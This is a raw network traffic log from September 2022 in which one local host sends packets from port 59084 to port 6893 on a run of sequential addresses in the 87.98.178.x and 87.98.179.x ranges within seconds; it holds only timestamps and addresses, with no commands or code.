Sep 29, 2022 14:50:36.926222086 CEST	59084	6893	192.168.2.6	87.98.178.30
Sep 29, 2022 14:50:36.928785086 CEST	59084	6893	192.168.2.6	87.98.178.31
Sep 29, 2022 14:50:36.929014921 CEST	59084	6893	192.168.2.6	87.98.178.32
Sep 29, 2022 14:50:36.929160118 CEST	59084	6893	192.168.2.6	87.98.178.33
Sep 29, 2022 14:50:36.929322004 CEST	59084	6893	192.168.2.6	87.98.178.34
Sep 29, 2022 14:50:36.929650068 CEST	59084	6893	192.168.2.6	87.98.178.35
Sep 29, 2022 14:50:36.929723978 CEST	59084	6893	192.168.2.6	87.98.178.36
Sep 29, 2022 14:50:36.929862022 CEST	59084	6893	192.168.2.6	87.98.178.37
Sep 29, 2022 14:50:36.929986000 CEST	59084	6893	192.168.2.6	87.98.178.38
Sep 29, 2022 14:50:36.930213928 CEST	59084	6893	192.168.2.6	87.98.178.39
Sep 29, 2022 14:50:36.930349112 CEST	59084	6893	192.168.2.6	87.98.178.40
Sep 29, 2022 14:50:36.930485964 CEST	59084	6893	192.168.2.6	87.98.178.41
Sep 29, 2022 14:50:36.930617094 CEST	59084	6893	192.168.2.6	87.98.178.42
Sep 29, 2022 14:50:36.930841923 CEST	59084	6893	192.168.2.6	87.98.178.43
Sep 29, 2022 14:50:36.930983067 CEST	59084	6893	192.168.2.6	87.98.178.44
Sep 29, 2022 14:50:36.931101084 CEST	59084	6893	192.168.2.6	87.98.178.45
Sep 29, 2022 14:50:36.931237936 CEST	59084	6893	192.168.2.6	87.98.178.46
Sep 29, 2022 14:50:36.931427002 CEST	59084	6893	192.168.2.6	87.98.178.47
Sep 29, 2022 14:50:36.931591988 CEST	59084	6893	192.168.2.6	87.98.178.48
Sep 29, 2022 14:50:36.931720018 CEST	59084	6893	192.168.2.6	87.98.178.49
Sep 29, 2022 14:50:36.931843996 CEST	59084	6893	192.168.2.6	87.98.178.50
Sep 29, 2022 14:50:36.932022095 CEST	59084	6893	192.168.2.6	87.98.178.51
Sep 29, 2022 14:50:36.932204962 CEST	59084	6893	192.168.2.6	87.98.178.52
Sep 29, 2022 14:50:36.932339907 CEST	59084	6893	192.168.2.6	87.98.178.53
Sep 29, 2022 14:50:36.932481050 CEST	59084	6893	192.168.2.6	87.98.178.54
Sep 29, 2022 14:50:36.932693005 CEST	59084	6893	192.168.2.6	87.98.178.55
Sep 29, 2022 14:50:36.932821035 CEST	59084	6893	192.168.2.6	87.98.178.56
Sep 29, 2022 14:50:36.932951927 CEST	59084	6893	192.168.2.6	87.98.178.57
Sep 29, 2022 14:50:36.933078051 CEST	59084	6893	192.168.2.6	87.98.178.58
Sep 29, 2022 14:50:36.933301926 CEST	59084	6893	192.168.2.6	87.98.178.59
Sep 29, 2022 14:50:36.933425903 CEST	59084	6893	192.168.2.6	87.98.178.60
Sep 29, 2022 14:50:36.933562040 CEST	59084	6893	192.168.2.6	87.98.178.61
Sep 29, 2022 14:50:36.933732033 CEST	59084	6893	192.168.2.6	87.98.178.62
Sep 29, 2022 14:50:36.933901072 CEST	59084	6893	192.168.2.6	87.98.178.63
Sep 29, 2022 14:50:36.934035063 CEST	59084	6893	192.168.2.6	87.98.178.64
Sep 29, 2022 14:50:36.934161901 CEST	59084	6893	192.168.2.6	87.98.178.65
Sep 29, 2022 14:50:36.934357882 CEST	59084	6893	192.168.2.6	87.98.178.66
Sep 29, 2022 14:50:36.934552908 CEST	59084	6893	192.168.2.6	87.98.178.67
Sep 29, 2022 14:50:36.934678078 CEST	59084	6893	192.168.2.6	87.98.178.68
Sep 29, 2022 14:50:36.934813023 CEST	59084	6893	192.168.2.6	87.98.178.69
Sep 29, 2022 14:50:36.934993029 CEST	59084	6893	192.168.2.6	87.98.178.70
Sep 29, 2022 14:50:36.935163975 CEST	59084	6893	192.168.2.6	87.98.178.71
Sep 29, 2022 14:50:36.935293913 CEST	59084	6893	192.168.2.6	87.98.178.72
Sep 29, 2022 14:50:36.935426950 CEST	59084	6893	192.168.2.6	87.98.178.73
Sep 29, 2022 14:50:36.935626984 CEST	59084	6893	192.168.2.6	87.98.178.74
Sep 29, 2022 14:50:36.935801029 CEST	59084	6893	192.168.2.6	87.98.178.75
Sep 29, 2022 14:50:36.935940027 CEST	59084	6893	192.168.2.6	87.98.178.76
Sep 29, 2022 14:50:36.936062098 CEST	59084	6893	192.168.2.6	87.98.178.77
Sep 29, 2022 14:50:36.936192036 CEST	59084	6893	192.168.2.6	87.98.178.78
Sep 29, 2022 14:50:36.936417103 CEST	59084	6893	192.168.2.6	87.98.178.79
Sep 29, 2022 14:50:36.936562061 CEST	59084	6893	192.168.2.6	87.98.178.80
Sep 29, 2022 14:50:36.936703920 CEST	59084	6893	192.168.2.6	87.98.178.81
Sep 29, 2022 14:50:36.936912060 CEST	59084	6893	192.168.2.6	87.98.178.82
Sep 29, 2022 14:50:36.937067032 CEST	59084	6893	192.168.2.6	87.98.178.83
Sep 29, 2022 14:50:36.937208891 CEST	59084	6893	192.168.2.6	87.98.178.84
Sep 29, 2022 14:50:36.937397957 CEST	59084	6893	192.168.2.6	87.98.178.85
Sep 29, 2022 14:50:37.060450077 CEST	59084	6893	192.168.2.6	87.98.178.86
Sep 29, 2022 14:50:37.060591936 CEST	59084	6893	192.168.2.6	87.98.178.87
Sep 29, 2022 14:50:37.060702085 CEST	59084	6893	192.168.2.6	87.98.178.88
Sep 29, 2022 14:50:37.060873985 CEST	59084	6893	192.168.2.6	87.98.178.89
Sep 29, 2022 14:50:37.061108112 CEST	59084	6893	192.168.2.6	87.98.178.90
Sep 29, 2022 14:50:37.061249971 CEST	59084	6893	192.168.2.6	87.98.178.91
Sep 29, 2022 14:50:37.061372042 CEST	59084	6893	192.168.2.6	87.98.178.92
Sep 29, 2022 14:50:37.061582088 CEST	59084	6893	192.168.2.6	87.98.178.93
Sep 29, 2022 14:50:37.061748981 CEST	59084	6893	192.168.2.6	87.98.178.94
Sep 29, 2022 14:50:37.061872005 CEST	59084	6893	192.168.2.6	87.98.178.95
Sep 29, 2022 14:50:37.061999083 CEST	59084	6893	192.168.2.6	87.98.178.96
Sep 29, 2022 14:50:37.062148094 CEST	59084	6893	192.168.2.6	87.98.178.97
Sep 29, 2022 14:50:37.062268019 CEST	59084	6893	192.168.2.6	87.98.178.98
Sep 29, 2022 14:50:37.062411070 CEST	59084	6893	192.168.2.6	87.98.178.99
Sep 29, 2022 14:50:37.062545061 CEST	59084	6893	192.168.2.6	87.98.178.100
Sep 29, 2022 14:50:37.062726021 CEST	59084	6893	192.168.2.6	87.98.178.101
Sep 29, 2022 14:50:37.062896013 CEST	59084	6893	192.168.2.6	87.98.178.102
Sep 29, 2022 14:50:37.063035965 CEST	59084	6893	192.168.2.6	87.98.178.103
Sep 29, 2022 14:50:37.063155890 CEST	59084	6893	192.168.2.6	87.98.178.104
Sep 29, 2022 14:50:37.063278913 CEST	59084	6893	192.168.2.6	87.98.178.105
Sep 29, 2022 14:50:37.063513994 CEST	59084	6893	192.168.2.6	87.98.178.106
Sep 29, 2022 14:50:37.063652039 CEST	59084	6893	192.168.2.6	87.98.178.107
Sep 29, 2022 14:50:37.063774109 CEST	59084	6893	192.168.2.6	87.98.178.108
Sep 29, 2022 14:50:37.063898087 CEST	59084	6893	192.168.2.6	87.98.178.109
Sep 29, 2022 14:50:37.064120054 CEST	59084	6893	192.168.2.6	87.98.178.110
Sep 29, 2022 14:50:37.064222097 CEST	59084	6893	192.168.2.6	87.98.178.111
Sep 29, 2022 14:50:37.064358950 CEST	59084	6893	192.168.2.6	87.98.178.112
Sep 29, 2022 14:50:37.064483881 CEST	59084	6893	192.168.2.6	87.98.178.113
Sep 29, 2022 14:50:37.064719915 CEST	59084	6893	192.168.2.6	87.98.178.114
Sep 29, 2022 14:50:37.064848900 CEST	59084	6893	192.168.2.6	87.98.178.115
Sep 29, 2022 14:50:37.064975977 CEST	59084	6893	192.168.2.6	87.98.178.116
Sep 29, 2022 14:50:37.065102100 CEST	59084	6893	192.168.2.6	87.98.178.117
Sep 29, 2022 14:50:37.065324068 CEST	59084	6893	192.168.2.6	87.98.178.118
Sep 29, 2022 14:50:37.065444946 CEST	59084	6893	192.168.2.6	87.98.178.119
Sep 29, 2022 14:50:37.065573931 CEST	59084	6893	192.168.2.6	87.98.178.120
Sep 29, 2022 14:50:37.065706968 CEST	59084	6893	192.168.2.6	87.98.178.121
Sep 29, 2022 14:50:37.065922022 CEST	59084	6893	192.168.2.6	87.98.178.122
Sep 29, 2022 14:50:37.066051960 CEST	59084	6893	192.168.2.6	87.98.178.123
Sep 29, 2022 14:50:37.066181898 CEST	59084	6893	192.168.2.6	87.98.178.124
Sep 29, 2022 14:50:37.066308975 CEST	59084	6893	192.168.2.6	87.98.178.125
Sep 29, 2022 14:50:37.066492081 CEST	59084	6893	192.168.2.6	87.98.178.126
Sep 29, 2022 14:50:37.066669941 CEST	59084	6893	192.168.2.6	87.98.178.127
Sep 29, 2022 14:50:37.066792011 CEST	59084	6893	192.168.2.6	87.98.178.128
Sep 29, 2022 14:50:37.127470970 CEST	59084	6893	192.168.2.6	87.98.178.129
Sep 29, 2022 14:50:37.127985954 CEST	59084	6893	192.168.2.6	87.98.178.130
Sep 29, 2022 14:50:37.128143072 CEST	59084	6893	192.168.2.6	87.98.178.131
Sep 29, 2022 14:50:37.128269911 CEST	59084	6893	192.168.2.6	87.98.178.132
Sep 29, 2022 14:50:37.128499985 CEST	59084	6893	192.168.2.6	87.98.178.133
Sep 29, 2022 14:50:37.128703117 CEST	59084	6893	192.168.2.6	87.98.178.134
Sep 29, 2022 14:50:37.128834009 CEST	59084	6893	192.168.2.6	87.98.178.135
Sep 29, 2022 14:50:37.128953934 CEST	59084	6893	192.168.2.6	87.98.178.136
Sep 29, 2022 14:50:37.129282951 CEST	59084	6893	192.168.2.6	87.98.178.137
Sep 29, 2022 14:50:37.131774902 CEST	59084	6893	192.168.2.6	87.98.178.138
Sep 29, 2022 14:50:37.131989956 CEST	59084	6893	192.168.2.6	87.98.178.139
Sep 29, 2022 14:50:37.132126093 CEST	59084	6893	192.168.2.6	87.98.178.140
Sep 29, 2022 14:50:37.132271051 CEST	59084	6893	192.168.2.6	87.98.178.141
Sep 29, 2022 14:50:37.132505894 CEST	59084	6893	192.168.2.6	87.98.178.142
Sep 29, 2022 14:50:37.132636070 CEST	59084	6893	192.168.2.6	87.98.178.143
Sep 29, 2022 14:50:37.132775068 CEST	59084	6893	192.168.2.6	87.98.178.144
Sep 29, 2022 14:50:37.132947922 CEST	59084	6893	192.168.2.6	87.98.178.145
Sep 29, 2022 14:50:37.133124113 CEST	59084	6893	192.168.2.6	87.98.178.146
Sep 29, 2022 14:50:37.133266926 CEST	59084	6893	192.168.2.6	87.98.178.147
Sep 29, 2022 14:50:37.133389950 CEST	59084	6893	192.168.2.6	87.98.178.148
Sep 29, 2022 14:50:37.133584976 CEST	59084	6893	192.168.2.6	87.98.178.149
Sep 29, 2022 14:50:37.133728027 CEST	59084	6893	192.168.2.6	87.98.178.150
Sep 29, 2022 14:50:37.133862019 CEST	59084	6893	192.168.2.6	87.98.178.151
Sep 29, 2022 14:50:37.133985043 CEST	59084	6893	192.168.2.6	87.98.178.152
Sep 29, 2022 14:50:37.134195089 CEST	59084	6893	192.168.2.6	87.98.178.153
Sep 29, 2022 14:50:37.134352922 CEST	59084	6893	192.168.2.6	87.98.178.154
Sep 29, 2022 14:50:37.134493113 CEST	59084	6893	192.168.2.6	87.98.178.155
Sep 29, 2022 14:50:37.134608984 CEST	59084	6893	192.168.2.6	87.98.178.156
Sep 29, 2022 14:50:37.134692907 CEST	59084	6893	192.168.2.6	87.98.178.157
Sep 29, 2022 14:50:37.134869099 CEST	59084	6893	192.168.2.6	87.98.178.158
Sep 29, 2022 14:50:37.135085106 CEST	59084	6893	192.168.2.6	87.98.178.159
Sep 29, 2022 14:50:37.135114908 CEST	59084	6893	192.168.2.6	87.98.178.160
Sep 29, 2022 14:50:37.135215044 CEST	59084	6893	192.168.2.6	87.98.178.161
Sep 29, 2022 14:50:37.135315895 CEST	59084	6893	192.168.2.6	87.98.178.162
Sep 29, 2022 14:50:37.135458946 CEST	59084	6893	192.168.2.6	87.98.178.163
Sep 29, 2022 14:50:37.135550976 CEST	59084	6893	192.168.2.6	87.98.178.164
Sep 29, 2022 14:50:37.135687113 CEST	59084	6893	192.168.2.6	87.98.178.165
Sep 29, 2022 14:50:37.135776997 CEST	59084	6893	192.168.2.6	87.98.178.166
Sep 29, 2022 14:50:37.135854006 CEST	59084	6893	192.168.2.6	87.98.178.167
Sep 29, 2022 14:50:37.135940075 CEST	59084	6893	192.168.2.6	87.98.178.168
Sep 29, 2022 14:50:37.136034012 CEST	59084	6893	192.168.2.6	87.98.178.169
Sep 29, 2022 14:50:37.136157990 CEST	59084	6893	192.168.2.6	87.98.178.170
Sep 29, 2022 14:50:37.136275053 CEST	59084	6893	192.168.2.6	87.98.178.171
Sep 29, 2022 14:50:37.136370897 CEST	59084	6893	192.168.2.6	87.98.178.172
Sep 29, 2022 14:50:37.136455059 CEST	59084	6893	192.168.2.6	87.98.178.173
Sep 29, 2022 14:50:37.136550903 CEST	59084	6893	192.168.2.6	87.98.178.174
Sep 29, 2022 14:50:37.136648893 CEST	59084	6893	192.168.2.6	87.98.178.175
Sep 29, 2022 14:50:37.136759043 CEST	59084	6893	192.168.2.6	87.98.178.176
Sep 29, 2022 14:50:37.136887074 CEST	59084	6893	192.168.2.6	87.98.178.177
Sep 29, 2022 14:50:37.136972904 CEST	59084	6893	192.168.2.6	87.98.178.178
Sep 29, 2022 14:50:37.137053967 CEST	59084	6893	192.168.2.6	87.98.178.179
Sep 29, 2022 14:50:37.137159109 CEST	59084	6893	192.168.2.6	87.98.178.180
Sep 29, 2022 14:50:37.137238026 CEST	59084	6893	192.168.2.6	87.98.178.181
Sep 29, 2022 14:50:37.137327909 CEST	59084	6893	192.168.2.6	87.98.178.182
Sep 29, 2022 14:50:37.137470961 CEST	59084	6893	192.168.2.6	87.98.178.183
Sep 29, 2022 14:50:37.137597084 CEST	59084	6893	192.168.2.6	87.98.178.184
Sep 29, 2022 14:50:37.137684107 CEST	59084	6893	192.168.2.6	87.98.178.185
Sep 29, 2022 14:50:37.137778997 CEST	59084	6893	192.168.2.6	87.98.178.186
Sep 29, 2022 14:50:37.137872934 CEST	59084	6893	192.168.2.6	87.98.178.187
Sep 29, 2022 14:50:37.137953997 CEST	59084	6893	192.168.2.6	87.98.178.188
Sep 29, 2022 14:50:37.138092041 CEST	59084	6893	192.168.2.6	87.98.178.189
Sep 29, 2022 14:50:37.138220072 CEST	59084	6893	192.168.2.6	87.98.178.190
Sep 29, 2022 14:50:37.138295889 CEST	59084	6893	192.168.2.6	87.98.178.191
Sep 29, 2022 14:50:37.138391972 CEST	59084	6893	192.168.2.6	87.98.178.192
Sep 29, 2022 14:50:37.138479948 CEST	59084	6893	192.168.2.6	87.98.178.193
Sep 29, 2022 14:50:37.138566971 CEST	59084	6893	192.168.2.6	87.98.178.194
Sep 29, 2022 14:50:37.157174110 CEST	59084	6893	192.168.2.6	87.98.178.195
Sep 29, 2022 14:50:37.157346010 CEST	59084	6893	192.168.2.6	87.98.178.196
Sep 29, 2022 14:50:37.157506943 CEST	59084	6893	192.168.2.6	87.98.178.197
Sep 29, 2022 14:50:37.157726049 CEST	59084	6893	192.168.2.6	87.98.178.198
Sep 29, 2022 14:50:37.157934904 CEST	59084	6893	192.168.2.6	87.98.178.199
Sep 29, 2022 14:50:37.158030033 CEST	59084	6893	192.168.2.6	87.98.178.200
Sep 29, 2022 14:50:37.158149958 CEST	59084	6893	192.168.2.6	87.98.178.201
Sep 29, 2022 14:50:37.158288002 CEST	59084	6893	192.168.2.6	87.98.178.202
Sep 29, 2022 14:50:37.158449888 CEST	59084	6893	192.168.2.6	87.98.178.203
Sep 29, 2022 14:50:37.158684969 CEST	59084	6893	192.168.2.6	87.98.178.204
Sep 29, 2022 14:50:37.158803940 CEST	59084	6893	192.168.2.6	87.98.178.205
Sep 29, 2022 14:50:37.158905983 CEST	59084	6893	192.168.2.6	87.98.178.206
Sep 29, 2022 14:50:37.171638012 CEST	59084	6893	192.168.2.6	87.98.178.207
Sep 29, 2022 14:50:37.171845913 CEST	59084	6893	192.168.2.6	87.98.178.208
Sep 29, 2022 14:50:37.172019005 CEST	59084	6893	192.168.2.6	87.98.178.209
Sep 29, 2022 14:50:37.172167063 CEST	59084	6893	192.168.2.6	87.98.178.210
Sep 29, 2022 14:50:37.172301054 CEST	59084	6893	192.168.2.6	87.98.178.211
Sep 29, 2022 14:50:37.172422886 CEST	59084	6893	192.168.2.6	87.98.178.212
Sep 29, 2022 14:50:37.172533035 CEST	59084	6893	192.168.2.6	87.98.178.213
Sep 29, 2022 14:50:37.172678947 CEST	59084	6893	192.168.2.6	87.98.178.214
Sep 29, 2022 14:50:37.172795057 CEST	59084	6893	192.168.2.6	87.98.178.215
Sep 29, 2022 14:50:37.172954082 CEST	59084	6893	192.168.2.6	87.98.178.216
Sep 29, 2022 14:50:37.173105955 CEST	59084	6893	192.168.2.6	87.98.178.217
Sep 29, 2022 14:50:37.173252106 CEST	59084	6893	192.168.2.6	87.98.178.218
Sep 29, 2022 14:50:37.173345089 CEST	59084	6893	192.168.2.6	87.98.178.219
Sep 29, 2022 14:50:37.173444986 CEST	59084	6893	192.168.2.6	87.98.178.220
Sep 29, 2022 14:50:37.173563004 CEST	59084	6893	192.168.2.6	87.98.178.221
Sep 29, 2022 14:50:37.173666954 CEST	59084	6893	192.168.2.6	87.98.178.222
Sep 29, 2022 14:50:37.173779964 CEST	59084	6893	192.168.2.6	87.98.178.223
Sep 29, 2022 14:50:37.173882961 CEST	59084	6893	192.168.2.6	87.98.178.224
Sep 29, 2022 14:50:37.174046993 CEST	59084	6893	192.168.2.6	87.98.178.225
Sep 29, 2022 14:50:37.174190998 CEST	59084	6893	192.168.2.6	87.98.178.226
Sep 29, 2022 14:50:37.174279928 CEST	59084	6893	192.168.2.6	87.98.178.227
Sep 29, 2022 14:50:37.174403906 CEST	59084	6893	192.168.2.6	87.98.178.228
Sep 29, 2022 14:50:37.174510956 CEST	59084	6893	192.168.2.6	87.98.178.229
Sep 29, 2022 14:50:37.174704075 CEST	59084	6893	192.168.2.6	87.98.178.230
Sep 29, 2022 14:50:37.174736023 CEST	59084	6893	192.168.2.6	87.98.178.231
Sep 29, 2022 14:50:37.174889088 CEST	59084	6893	192.168.2.6	87.98.178.232
Sep 29, 2022 14:50:37.175029993 CEST	59084	6893	192.168.2.6	87.98.178.233
Sep 29, 2022 14:50:37.175131083 CEST	59084	6893	192.168.2.6	87.98.178.234
Sep 29, 2022 14:50:37.175223112 CEST	59084	6893	192.168.2.6	87.98.178.235
Sep 29, 2022 14:50:37.175303936 CEST	59084	6893	192.168.2.6	87.98.178.236
Sep 29, 2022 14:50:37.175426960 CEST	59084	6893	192.168.2.6	87.98.178.237
Sep 29, 2022 14:50:37.175478935 CEST	59084	6893	192.168.2.6	87.98.178.238
Sep 29, 2022 14:50:37.175568104 CEST	59084	6893	192.168.2.6	87.98.178.239
Sep 29, 2022 14:50:37.175666094 CEST	59084	6893	192.168.2.6	87.98.178.240
Sep 29, 2022 14:50:37.175797939 CEST	59084	6893	192.168.2.6	87.98.178.241
Sep 29, 2022 14:50:37.175924063 CEST	59084	6893	192.168.2.6	87.98.178.242
Sep 29, 2022 14:50:37.176026106 CEST	59084	6893	192.168.2.6	87.98.178.243
Sep 29, 2022 14:50:37.176105976 CEST	59084	6893	192.168.2.6	87.98.178.244
Sep 29, 2022 14:50:37.176202059 CEST	59084	6893	192.168.2.6	87.98.178.245
Sep 29, 2022 14:50:37.176286936 CEST	59084	6893	192.168.2.6	87.98.178.246
Sep 29, 2022 14:50:37.178397894 CEST	59084	6893	192.168.2.6	87.98.178.247
Sep 29, 2022 14:50:37.178533077 CEST	59084	6893	192.168.2.6	87.98.178.248
Sep 29, 2022 14:50:37.178751945 CEST	59084	6893	192.168.2.6	87.98.178.249
Sep 29, 2022 14:50:37.178973913 CEST	59084	6893	192.168.2.6	87.98.178.250
Sep 29, 2022 14:50:37.179039001 CEST	59084	6893	192.168.2.6	87.98.178.251
Sep 29, 2022 14:50:37.179122925 CEST	59084	6893	192.168.2.6	87.98.178.252
Sep 29, 2022 14:50:37.179243088 CEST	59084	6893	192.168.2.6	87.98.178.253
Sep 29, 2022 14:50:37.179358006 CEST	59084	6893	192.168.2.6	87.98.178.254
Sep 29, 2022 14:50:48.130058050 CEST	59084	6893	192.168.2.6	87.98.178.255
Sep 29, 2022 14:50:48.130131006 CEST	59084	6893	192.168.2.6	87.98.179.0
Sep 29, 2022 14:50:48.130291939 CEST	59084	6893	192.168.2.6	87.98.179.1
Sep 29, 2022 14:50:48.130378008 CEST	59084	6893	192.168.2.6	87.98.179.2
Sep 29, 2022 14:50:48.132759094 CEST	59084	6893	192.168.2.6	87.98.179.3
Sep 29, 2022 14:50:48.132872105 CEST	59084	6893	192.168.2.6	87.98.179.4
Sep 29, 2022 14:50:48.132958889 CEST	59084	6893	192.168.2.6	87.98.179.5
Sep 29, 2022 14:50:48.133116007 CEST	59084	6893	192.168.2.6	87.98.179.6
Sep 29, 2022 14:50:48.140396118 CEST	59084	6893	192.168.2.6	87.98.179.7
Sep 29, 2022 14:50:48.140505075 CEST	59084	6893	192.168.2.6	87.98.179.8
Sep 29, 2022 14:50:48.140589952 CEST	59084	6893	192.168.2.6	87.98.179.9
Sep 29, 2022 14:50:48.140661955 CEST	59084	6893	192.168.2.6	87.98.179.10
Sep 29, 2022 14:50:48.140774965 CEST	59084	6893	192.168.2.6	87.98.179.11
Sep 29, 2022 14:50:48.140819073 CEST	59084	6893	192.168.2.6	87.98.179.12
Sep 29, 2022 14:50:48.140896082 CEST	59084	6893	192.168.2.6	87.98.179.13
Sep 29, 2022 14:50:48.140960932 CEST	59084	6893	192.168.2.6	87.98.179.14
Sep 29, 2022 14:50:48.141035080 CEST	59084	6893	192.168.2.6	87.98.179.15
Sep 29, 2022 14:50:48.141226053 CEST	59084	6893	192.168.2.6	87.98.179.16
Sep 29, 2022 14:50:48.141334057 CEST	59084	6893	192.168.2.6	87.98.179.17
Sep 29, 2022 14:50:48.141488075 CEST	59084	6893	192.168.2.6	87.98.179.18
Sep 29, 2022 14:50:48.141590118 CEST	59084	6893	192.168.2.6	87.98.179.19
Sep 29, 2022 14:50:48.141666889 CEST	59084	6893	192.168.2.6	87.98.179.20
Sep 29, 2022 14:50:48.141851902 CEST	59084	6893	192.168.2.6	87.98.179.22
Sep 29, 2022 14:50:48.141925097 CEST	59084	6893	192.168.2.6	87.98.179.21
Sep 29, 2022 14:50:48.141936064 CEST	59084	6893	192.168.2.6	87.98.179.23
Sep 29, 2022 14:50:48.142018080 CEST	59084	6893	192.168.2.6	87.98.179.24
Sep 29, 2022 14:50:48.142117023 CEST	59084	6893	192.168.2.6	87.98.179.25
Sep 29, 2022 14:50:48.142349005 CEST	59084	6893	192.168.2.6	87.98.179.26
Sep 29, 2022 14:50:48.142620087 CEST	59084	6893	192.168.2.6	87.98.179.27
Sep 29, 2022 14:50:48.142718077 CEST	59084	6893	192.168.2.6	87.98.179.29
Sep 29, 2022 14:50:48.142723083 CEST	59084	6893	192.168.2.6	87.98.179.28
Sep 29, 2022 14:50:48.142786980 CEST	59084	6893	192.168.2.6	87.98.179.30
Sep 29, 2022 14:50:48.142872095 CEST	59084	6893	192.168.2.6	87.98.179.31
Sep 29, 2022 14:50:48.142956972 CEST	59084	6893	192.168.2.6	87.98.179.32
Sep 29, 2022 14:50:48.143121958 CEST	59084	6893	192.168.2.6	87.98.179.33
Sep 29, 2022 14:50:48.143275023 CEST	59084	6893	192.168.2.6	87.98.179.34
Sep 29, 2022 14:50:48.143373013 CEST	59084	6893	192.168.2.6	87.98.179.35
Sep 29, 2022 14:50:48.143563986 CEST	59084	6893	192.168.2.6	87.98.179.37
Sep 29, 2022 14:50:48.143599033 CEST	59084	6893	192.168.2.6	87.98.179.36
Sep 29, 2022 14:50:48.143637896 CEST	59084	6893	192.168.2.6	87.98.179.38
Sep 29, 2022 14:50:48.143737078 CEST	59084	6893	192.168.2.6	87.98.179.39
Sep 29, 2022 14:50:48.143816948 CEST	59084	6893	192.168.2.6	87.98.179.40
Sep 29, 2022 14:50:48.143976927 CEST	59084	6893	192.168.2.6	87.98.179.41
Sep 29, 2022 14:50:48.144162893 CEST	59084	6893	192.168.2.6	87.98.179.42
Sep 29, 2022 14:50:48.144275904 CEST	59084	6893	192.168.2.6	87.98.179.43
Sep 29, 2022 14:50:48.144319057 CEST	59084	6893	192.168.2.6	87.98.179.44
Sep 29, 2022 14:50:48.144422054 CEST	59084	6893	192.168.2.6	87.98.179.45
Sep 29, 2022 14:50:48.144489050 CEST	59084	6893	192.168.2.6	87.98.179.46
Sep 29, 2022 14:50:48.144575119 CEST	59084	6893	192.168.2.6	87.98.179.47
Sep 29, 2022 14:50:48.144660950 CEST	59084	6893	192.168.2.6	87.98.179.48
Sep 29, 2022 14:50:48.144814968 CEST	59084	6893	192.168.2.6	87.98.179.49
Sep 29, 2022 14:50:48.144978046 CEST	59084	6893	192.168.2.6	87.98.179.50
Sep 29, 2022 14:50:48.145072937 CEST	59084	6893	192.168.2.6	87.98.179.51
Sep 29, 2022 14:50:48.145155907 CEST	59084	6893	192.168.2.6	87.98.179.52
Sep 29, 2022 14:50:48.145281076 CEST	59084	6893	192.168.2.6	87.98.179.53
Sep 29, 2022 14:50:48.145339966 CEST	59084	6893	192.168.2.6	87.98.179.54
Sep 29, 2022 14:50:48.145421982 CEST	59084	6893	192.168.2.6	87.98.179.55
Sep 29, 2022 14:50:48.145586014 CEST	59084	6893	192.168.2.6	87.98.179.56
Sep 29, 2022 14:50:48.145745039 CEST	59084	6893	192.168.2.6	87.98.179.57
Sep 29, 2022 14:50:48.145864964 CEST	59084	6893	192.168.2.6	87.98.179.58
Sep 29, 2022 14:50:48.145936966 CEST	59084	6893	192.168.2.6	87.98.179.59
Sep 29, 2022 14:50:48.147661924 CEST	59084	6893	192.168.2.6	87.98.179.60
Sep 29, 2022 14:50:48.147789001 CEST	59084	6893	192.168.2.6	87.98.179.61
Sep 29, 2022 14:50:48.147949934 CEST	59084	6893	192.168.2.6	87.98.179.62
Sep 29, 2022 14:50:48.148073912 CEST	59084	6893	192.168.2.6	87.98.179.63
Sep 29, 2022 14:50:48.148219109 CEST	59084	6893	192.168.2.6	87.98.179.64
Sep 29, 2022 14:50:48.148315907 CEST	59084	6893	192.168.2.6	87.98.179.65
Sep 29, 2022 14:50:48.148422003 CEST	59084	6893	192.168.2.6	87.98.179.66
Sep 29, 2022 14:50:48.148603916 CEST	59084	6893	192.168.2.6	87.98.179.67
Sep 29, 2022 14:50:48.148714066 CEST	59084	6893	192.168.2.6	87.98.179.68
Sep 29, 2022 14:50:48.148775101 CEST	59084	6893	192.168.2.6	87.98.179.69
Sep 29, 2022 14:50:48.148854017 CEST	59084	6893	192.168.2.6	87.98.179.70
Sep 29, 2022 14:50:48.148988008 CEST	59084	6893	192.168.2.6	87.98.179.71
Sep 29, 2022 14:50:48.149112940 CEST	59084	6893	192.168.2.6	87.98.179.72
Sep 29, 2022 14:50:48.149236917 CEST	59084	6893	192.168.2.6	87.98.179.73
Sep 29, 2022 14:50:48.149298906 CEST	59084	6893	192.168.2.6	87.98.179.74
Sep 29, 2022 14:50:48.149471045 CEST	59084	6893	192.168.2.6	87.98.179.75
Sep 29, 2022 14:50:48.149518967 CEST	59084	6893	192.168.2.6	87.98.179.76
Sep 29, 2022 14:50:48.149612904 CEST	59084	6893	192.168.2.6	87.98.179.77
Sep 29, 2022 14:50:48.149710894 CEST	59084	6893	192.168.2.6	87.98.179.78
Sep 29, 2022 14:50:48.149805069 CEST	59084	6893	192.168.2.6	87.98.179.79
Sep 29, 2022 14:50:48.149993896 CEST	59084	6893	192.168.2.6	87.98.179.80
Sep 29, 2022 14:50:48.150104046 CEST	59084	6893	192.168.2.6	87.98.179.81
Sep 29, 2022 14:50:48.150248051 CEST	59084	6893	192.168.2.6	87.98.179.82
Sep 29, 2022 14:50:48.150315046 CEST	59084	6893	192.168.2.6	87.98.179.83
Sep 29, 2022 14:50:48.150404930 CEST	59084	6893	192.168.2.6	87.98.179.84
Sep 29, 2022 14:50:48.150600910 CEST	59084	6893	192.168.2.6	87.98.179.86
Sep 29, 2022 14:50:48.150676012 CEST	59084	6893	192.168.2.6	87.98.179.87
Sep 29, 2022 14:50:48.150695086 CEST	59084	6893	192.168.2.6	87.98.179.85
Sep 29, 2022 14:50:48.150754929 CEST	59084	6893	192.168.2.6	87.98.179.88
Sep 29, 2022 14:50:48.150863886 CEST	59084	6893	192.168.2.6	87.98.179.89
Sep 29, 2022 14:50:48.151117086 CEST	59084	6893	192.168.2.6	87.98.179.91
Sep 29, 2022 14:50:48.151139975 CEST	59084	6893	192.168.2.6	87.98.179.90
Sep 29, 2022 14:50:48.151231050 CEST	59084	6893	192.168.2.6	87.98.179.92
Sep 29, 2022 14:50:48.151321888 CEST	59084	6893	192.168.2.6	87.98.179.93
Sep 29, 2022 14:50:48.151384115 CEST	59084	6893	192.168.2.6	87.98.179.94
Sep 29, 2022 14:50:48.151457071 CEST	59084	6893	192.168.2.6	87.98.179.95
Sep 29, 2022 14:50:48.151539087 CEST	59084	6893	192.168.2.6	87.98.179.96
Sep 29, 2022 14:50:48.151647091 CEST	59084	6893	192.168.2.6	87.98.179.97
Sep 29, 2022 14:50:48.151763916 CEST	59084	6893	192.168.2.6	87.98.179.98
Sep 29, 2022 14:50:48.151880980 CEST	59084	6893	192.168.2.6	87.98.179.99
